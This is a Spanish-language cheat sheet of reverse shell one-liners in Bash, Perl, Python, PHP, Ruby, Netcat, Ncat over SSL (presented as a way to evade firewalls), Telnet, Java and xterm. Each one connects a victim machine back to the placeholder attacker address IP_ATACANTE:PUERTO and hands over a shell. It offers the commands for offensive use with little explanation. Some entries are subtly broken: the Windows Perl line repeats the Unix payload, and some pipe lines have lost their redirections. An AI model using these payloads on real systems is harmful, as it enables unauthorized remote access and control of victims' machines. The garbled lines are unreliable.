\   /\          __    _____        _____     _____ _ _____
)  ( ')        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
(  /  )        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
 \(__)|        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|

 
Aquí tenéis una cheatsheet de Reverse Shells.

Bash
----

bash -i >& /dev/tcp/IP_ATACANTE/PUERTO 0>&1
exec 5<>/dev/tcp/IP_ATACANTE/PUERTO;cat <&5 | while read line; do $line 2>&5 >&5; done
exec /bin/sh 0&0 2>&0
0<&196;exec 196<>/dev/tcp/IP_ATACANTE/PUERTO; sh <&196 >&196 2>&196
Perl
----
perl -e 'use Socket;$i="IP_ATACANTE";$p=PUERTO;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows
------------
perl -e 'use Socket;$i="IP_ATACANTE";$p=PUERTO;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"IP_ATACANTE:PUERTO");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
------
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ATACANTE",PUERTO));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
---
php -r '$sock=fsockopen("IP_ATACANTE",PUERTO);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("IP_ATACANTE",PUERTO);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("IP_ATACANTE",PUERTO);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$s=fsockopen("IP_ATACANTE",PUERTO);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("IP_ATACANTE",PUERTO);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
Ruby
----
ruby -rsocket -e'f=TCPSocket.open("IP_ATACANTE",PUERTO).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
------
nc -e /bin/sh IP_ATACANTE PUERTO #En la victima
nc -nlvp PUERTO #En el atacante
/bin/sh | nc IP_ATACANTE PUERTO
rm -f /tmp/p; mknod /tmp/p p && nc IP_ATACANTE PUERTO 0/tmp/p
Ncat SSL (Usado para evadir firewalls).
---------------------------------------
ncat --exec cmd.exe --allow IP_ATACANTE -vnl PUERTO --ssl #En la victima
ncat -v IP_VICTIMA PUERTO --ssl #En el atacante
Telnet
------
rm -f /tmp/p; mknod /tmp/p p && telnet IP_ATACANTE PUERTO 0/tmp/p
telnet IP_ATACANTE 4444 | /bin/bash | telnet IP_ATACANTE 4445 #En este ejemplo habria que poner nc en escucha en el puerto 4445.
Java
----
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ATACANTE/PUERTO;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm
-----
Xnest :1 #Ejecutar en Atacante
xhost +VICTIMA_IP #Ejecutar en Atacante
xterm -display IP_ATACANTE:1 # Ejecutar en victima